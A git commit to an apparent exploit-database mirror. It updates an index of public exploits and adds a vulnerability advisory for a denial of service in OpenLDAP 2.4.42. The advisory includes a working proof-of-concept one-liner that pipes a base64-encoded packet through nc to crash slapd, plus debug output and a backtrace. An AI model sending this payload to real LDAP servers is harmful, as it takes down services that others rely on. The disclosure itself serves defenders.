DB: 2015-09-12

6 new exploits
2015-09-12 05:02:45 +00:00 · 2015-09-12 05:02:45 +00:00 · 1ba31aab30
commit 1ba31aab30
parent 42b241205e
7 changed files with 563 additions and 20 deletions
--- a/files.csv
+++ b/files.csv
@ -33262,7 +33262,7 @@ id,file,description,date,author,platform,type,port
 36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
 36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
-36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
+36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
 36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
 36863,platforms/php/webapps/36863.txt,"Joomla Machine Component Multiple SQL Injection Vulnerabilities",2012-02-20,the_cyber_nuxbie,php,webapps,0
 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0
@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
 36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
-37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
+37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0
 36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
 37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
 36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33384,8 +33384,8 @@ id,file,description,date,author,platform,type,port
 36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0
 36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
 36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
-36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
-36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
+36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0
+36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,hyp3rlinx,php,webapps,0
 36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
 36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
@ -33461,7 +33461,7 @@ id,file,description,date,author,platform,type,port
 37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
 37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
-37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
+37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80
 37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
 37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
 37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
@ -33658,9 +33658,9 @@ id,file,description,date,author,platform,type,port
 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
-37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
+37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80
 37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
-37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
+37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080
 37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
 37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
 37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
 37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
 37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
-37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
+37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
 37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
 37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
 37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
@ -33796,7 +33796,7 @@ id,file,description,date,author,platform,type,port
 37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0
 37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection Vulnerability",2012-06-20,"Taurus Omar",php,webapps,0
 37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Vulnerability",2012-06-21,"Sooraj K.S",php,webapps,0
-37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,"John Page",php,webapps,80
+37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80
 37441,platforms/jsp/webapps/37441.txt,"WedgeOS <= 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0
 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434
 37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Vulnerability",2012-06-21,CoBRa_21,php,webapps,0
@ -33867,7 +33867,7 @@ id,file,description,date,author,platform,type,port
 37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
 37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
-37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,"John Page",php,webapps,80
+37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
@ -33877,7 +33877,7 @@ id,file,description,date,author,platform,type,port
 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload Vulnerability",2012-07-21,Am!r,php,webapps,0
 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
 37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
-37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
+37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,hyp3rlinx,windows,dos,0
 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
@ -33930,7 +33930,7 @@ id,file,description,date,author,platform,type,port
 37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
 37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
-37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
+37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80
 37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
 37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
 37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
@ -34020,7 +34020,7 @@ id,file,description,date,author,platform,type,port
 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
 37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
-37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
+37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
 37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
 37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
 37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
@ -34033,7 +34033,7 @@ id,file,description,date,author,platform,type,port
 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
 37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
-37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
+37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
@ -34043,10 +34043,10 @@ id,file,description,date,author,platform,type,port
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
-37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
+37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,hyp3rlinx,php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
 37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
-37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,hyp3rlinx,php,webapps,80
 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
@ -34153,9 +34153,9 @@ id,file,description,date,author,platform,type,port
 37812,platforms/win32/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win32,remote,8443
 37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0
 37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,metasploit,python,remote,0
-37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,"John Page",php,webapps,80
-37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,"John Page",php,webapps,80
-37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,"John Page",php,webapps,80
+37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,hyp3rlinx,php,webapps,80
+37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,hyp3rlinx,php,webapps,80
+37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80
 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
@ -34382,6 +34382,7 @@ id,file,description,date,author,platform,type,port
 38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
 38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
+38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack Vulnerability",2015-09-02,"Pier-Luc Maltais",php,webapps,80
 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80
 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
@ -34410,7 +34411,7 @@ id,file,description,date,author,platform,type,port
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
-38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
+38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
 38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 - XSS Vulnerability",2015-09-08,Outlasted,php,webapps,80
 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
 38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
@ -34429,6 +34430,7 @@ id,file,description,date,author,platform,type,port
 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
+38126,platforms/osx/shellcode/38126.c,"OS X x64 - tcp bind shellcode_ NULL byte free (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
 38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
@ -34445,3 +34447,7 @@ id,file,description,date,author,platform,type,port
 38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
 38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
 38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
+38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
+38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
+38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
+38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
--- a/platforms/linux/dos/38145.txt
+++ b/platforms/linux/dos/38145.txt
@ -0,0 +1,129 @@
+# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS
+# Date: 11/09/15
+# Exploit Author: Denis Andzakovic - Security-Assessment.com
+# Vendor Homepage: http://www.openldap.org/
+# Software Link:
+ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz
+# Version: <= 2.4.42
+# Tested on: Debian 8
+
+(    , )     (,
+  .   '.' ) ('.    ',
+   ). , ('.   ( ) (
+  (_,) .'), ) _ _,
+ /  _____/  / _  \    ____  ____   _____
+ \____  \==/ /_\  \ _/ ___\/  _ \ /     \
+ /       \/   |    \\  \__(  <_> )  Y Y  \
+/______  /\___|__  / \___  >____/|__|_|  /
+        \/         \/.-.    \/         \/:wq
+                    (x.0)
+                  '=.|w|.='
+                  _=''"''=.
+
+                presents..
+OpenLDAP get_ber_next Denial of Service
+Affected Versions: OpenLDAP <= 2.4.42
+
+PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf
+
+-------------+
+| Description |
+-------------+
+By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert() statement, crashing 
+the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian 
+package repository.
+
+--------------+
+| Exploitation |
+--------------+
+By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an 
+assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data. 
+
+The following proof of concept exploit can be used to trigger the condition:
+
+--[ Exploit POC
+echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389
+
+The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash
+the server even when running in daemon mode. 
+
+--[ sladp -d3
+55f0b36e slap_listener_activate(7): 
+55f0b36e >>> slap_listener(ldap:///)
+55f0b36e connection_get(15): got connid=1000
+55f0b36e connection_read(15): checking for input on id=1000
+ber_get_next
+ldap_read: want=8, got=8
+  0000:  ff 84 84 84 84 84 77 83                            ......w.          
+55f0b36e connection_get(15): got connid=1000
+55f0b36e connection_read(15): checking for input on id=1000
+ber_get_next
+ldap_read: want=1, got=1
+  0000:  0a                                                 .                 
+55f0b36e connection_get(15): got connid=1000
+55f0b36e connection_read(15): checking for input on id=1000
+ber_get_next
+slapd: io.c:682: ber_get_next: Assertion `0' failed.
+
+The following GDB back trace provides further information as to the location of the issue.
+
+--[ back trace
+program received signal SIGABRT, Aborted.
+[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
+0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
+(gdb) bt
+#0  0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
+#1  0x00007ffff6a144e8 in __GI_abort () at abort.c:89
+#2  0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", 
+    line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
+#3  0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, 
+    function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
+#4  0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682
+#5  0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572
+#6  connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460
+#7  connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
+#8  0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
+#9  0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309
+#10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
+
+----------+
+| Solution |
+----------+
+This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in
+git://git.openldap.org/openldap.git
+
+----------+
+| Timeline |
+----------+
+
+10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a ‘minor’ security issue, as per the requirements in
+the ITS, making the issue public.
+10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
+10/09/15 - Release of this advisory document.
+
+-------------------------------+
+| About Security-Assessment.com |
+-------------------------------+
+
+Security-Assessment.com is Australasia's leading team of Information Security
+consultants specialising in providing high quality Information Security 
+services to clients throughout the Asia Pacific region. Our clients include
+some of the largest globally recognised companies in areas such as finance,
+telecommunications, broadcasting, legal and government. Our aim is to provide
+the very best independent advice and a high level of technical expertise while
+creating long and lasting professional relationships with our clients.
+
+Security-Assessment.com is committed to security research and development,
